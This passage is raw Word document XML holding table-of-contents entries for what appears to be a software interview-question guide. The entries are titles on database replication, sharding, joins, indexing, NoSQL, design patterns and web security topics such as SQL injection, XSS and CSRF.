                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E9948A2" w14:textId="02A4F22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07" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is database replication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116</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79842D57" w14:textId="04B0B36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08" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is database sharding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118</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ECC4F2D" w14:textId="0B5D54D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09" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the difference between LEFT OUTER JOIN and RIGHT OUTER JOIN.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_Toc178383309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119</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F0652D4" w14:textId="047CEDA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0" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>When would you use UNION instead of a join?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119</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10A474EC" w14:textId="1E1428D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1" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is a composite index</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120</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1026366A" w14:textId="16FD329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2" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How does an index improve query performance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121</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25022839" w14:textId="1496308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3" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the difference between a unique index and a primary key constraint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122</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ECDD085" w14:textId="3A95DEE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4" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is connection pooling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122</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18C578E7" w14:textId="478840C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5" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is table locking, give me some types of locking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123</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6ABBEFAF" w14:textId="4DADC50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6" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is query optimization, and why is it important in database systems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124</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46E70E80" w14:textId="18213BF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7" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are query hints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125</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29241CFE" w14:textId="3F37FE5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8" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is view and when to use it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126</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6979039A" w14:textId="478557C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19" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the differences between data-at-rest encryption and data-in-transit encryption.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_Toc178383319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127</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="628C2826" w14:textId="784E415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20" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of database auditing.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127</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35ED27A7" w14:textId="0338512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21" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is SQL injection, and how can you prevent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128</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6616F015" w14:textId="118CC17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22" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of database anomaly detection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130</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19053B3C" w14:textId="5A957F1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23" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is denormalization, and why is it commonly used in NoSQL databases?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131</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78BE2BF5" w14:textId="41BD4BE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24" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are secondary indexes in NoSQL databases, and how are they used for query optimization?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132</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32A95AEE" w14:textId="7785E8C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25" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are some common security considerations in NoSQL databases?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133</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="261218EE" w14:textId="3D55C8DB"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26" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is horizontal partitioning, and how does it help improve scalability in NoSQL databases?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134</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F532C58" w14:textId="4FE676B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27" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain how indexing works in MongoDB to optimize query performance.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134</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54D8E331" w14:textId="307FE80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28" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Describe best practices for securing and managing data in MongoDB.</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135</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F90A39F" w14:textId="2D569CE5"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329" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>System Design/Pattern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_Toc178383329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137</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AE1D5EB" w14:textId="491AFD8A"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30" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain what SOLID principles are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137</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14D852F8" w14:textId="6BECB7A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31" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are design patterns, and why are they important in software development?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137</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49F3A938" w14:textId="40A1DEE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32" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Describe the Singleton pattern.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138</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23AF9ADE" w14:textId="5415D02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33" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the Factory Method pattern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139</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22D5021A" w14:textId="4C53B89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34" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the Observer pattern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141</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60BE75E9" w14:textId="28944CF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35" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the Decorator pattern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142</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05BE5D04" w14:textId="5D150CD7"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336" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Security</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145</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73030F1C" w14:textId="2709081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37" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are some common security vulnerabilities in Node.js applications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145</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="576788E6" w14:textId="5B11417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38" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain XSS attacks and how to prevent it.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145</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39FBD6C4" w14:textId="4C09D11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39" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is Cross-Site Request Forgery (CSRF)</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_Toc178383339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147</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D6AF6AC" w14:textId="511EFB6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40" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of SQL injection attacks.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147</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
